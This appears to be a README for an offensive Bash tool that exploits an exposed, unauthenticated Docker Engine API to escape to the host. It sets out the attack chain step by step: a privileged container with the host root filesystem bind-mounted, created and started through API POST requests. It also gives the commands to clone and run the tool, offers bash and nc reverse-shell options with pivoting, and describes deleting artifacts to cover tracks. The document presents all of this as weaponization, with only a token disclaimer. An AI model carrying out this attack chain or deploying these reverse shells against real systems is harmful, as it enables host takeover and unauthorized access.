The Cinematic Docker Escape | An API Exploitation Framework
Creator: C0deGhost | Version: 4.4 (Stable) | MITRE T1611
Click to view Table of Contents Fsociety
Click to expand Fsociety Intel Report...
This framework weaponizes **CVE-2025-9074**, a critical misconfiguration vulnerability where the Docker Engine API is exposed to the network without authentication. This is not a software flaw; it is a fundamental architectural weakness that provides an unauthenticated attacker with administrative control over the Docker daemon.
The DAEMON_KILLER automates the process of leveraging this access to deploy a hyper-privileged container, break out of its isolation, and achieve full root-level command execution on the host machine.
The most critical parameter is the Bind Mount. By binding the host's root filesystem (/) to a directory inside the container (e.g., /mnt/host), we gain unrestricted read/write access to the entire host system. Combined with --privileged mode, this effectively nullifies all container isolation mechanisms.
Attack Chain (Simplified):
- Connect to the exposed Docker API endpoint (e.g.,
http://<target>:2375). - Craft a malicious
config.jsonpayload specifying a privileged container with a root filesystem bind mount. - Inject the payload via a
POSTrequest to/containers/create. - Start the newly created container via a
POSTrequest to/containers/{id}/start. - Execute a reverse shell or interactive commands within the compromised container, which now has full control over the host filesystem.
Control is an illusion.
- Tactic: Privilege Escalation & Execution
- Technique: Escape to Host
graph TD;
A[<font color=red>Attacker</font>] --> B{Exposed Docker API};
B --> C[1. Craft Malicious JSON];
C --> D{POST /containers/create};
D --> E[<font color=yellow>Privileged Container Created</font>];
E --> F{POST /containers/start};
F --> G[2. Payload Execution];
G --> H[<font color=cyan>Container has Root FS Mount</font>];
H --> I[<font color=red>3. Full Host Takeover</font>];
- 🎬 Cinematic UX/UI: Immersive, animated interface inspired by Mr. Robot, turning exploitation into a visual experience.
- 🚀 Dual Exploit Vectors: Choose between a high-power, persistent
bash -ireverse shell or a lightweight, surgical Alpine-based interactive shell. - -bash- Pure BASH Implementation: Zero dependencies. Runs on any standard Linux attack box with just
bashandcurl. - 👑 Auto-Privileged & Networked: All malicious containers are automatically created with
--privilegedand full internet access (via Google DNS) for post-exploitation tooling. - 🔬 Real-Time Forensic Verbose Mode: A deep-dive verbose mode that dissects every command, every raw server response, and every extracted artifact in real-time.
- 🌐 In-Shell Pivoting: The interactive shell includes a built-in
revshellcommand, allowing you to launch secondary shells from your established foothold.
¿Are you a 1 or a 0?
Click to view Fsociety Operation Manual...
git clone https://github.com/fsoc-ghost-0x/CVE-2025-9074_DAEMON_KILLER.git
cd CVE-2025-9074_DAEMON_KILLERchmod +x Fsociety-CVE-2025-9074_v4.4.shThe framework is fully interactive. Simply execute the script and follow the prompts.
./Fsociety-CVE-2025-9074_v4.4.sh- You will be prompted for the Target IP and Port.
- You will then select your Exploit Vector ([1] or [2]).
- Based on your choice, you will configure your listener details (
LHOST/LPORT) or activate verbose mode.
Click to expand Proof of Concept Gallery...
Clean, interactive, and thematic user interface for target configuration and vector selection.
Cinematic execution of the heavy payload, followed by a root shell on the listener.
Activating the Alpine-based interactive shell and using the info command to perform reconnaissance on the container's configuration.
Using the built-in revshell command from within the interactive shell to launch a secondary reverse shell to another listener.
Click to view full Command Line Interface...
The primary modes of operation, selected at runtime.
| Option | Vector Name | Description |
|---|---|---|
[1] |
Classic Reverse Shell | Deploys a container using a heavy-payload image (docker_setup-nginx-php) to establish a persistent bash -i reverse shell. Ideal for direct control. |
[2] |
Interactive Shell | Deploys a lightweight Alpine container for stealth operations. Provides a pseudo-interactive shell via API exec commands. Ideal for surgical tasks and pivoting. |
Commands available only within the Vector 2 Interactive Shell.
| Command | Syntax | Description |
|---|---|---|
info |
info |
Displays a detailed intelligence dashboard of the current container, including mount points, network settings, and privilege status. |
revshell |
revshell |
Launches a secondary nc reverse shell from the container to a specified listener. Perfect for pivoting or handing off access. |
exit |
exit |
Kills and deletes the malicious container, wiping the primary artifacts from the Docker daemon. |
|
<linux_command> |
Any other input is executed as a standard Linux command inside the container (e.g., ls -la /mnt/host/etc). |
This tool is intended for educational purposes, security research, and authorized penetration testing engagements only. The author and Fsociety are not responsible for any misuse or damage caused by this program. Use this tool ethically and responsibly.
Those at the top don't like people with my powers.
WE ARE FSOCIETY. WE ARE FINALLY FREE. WE ARE FINALLY AWAKE.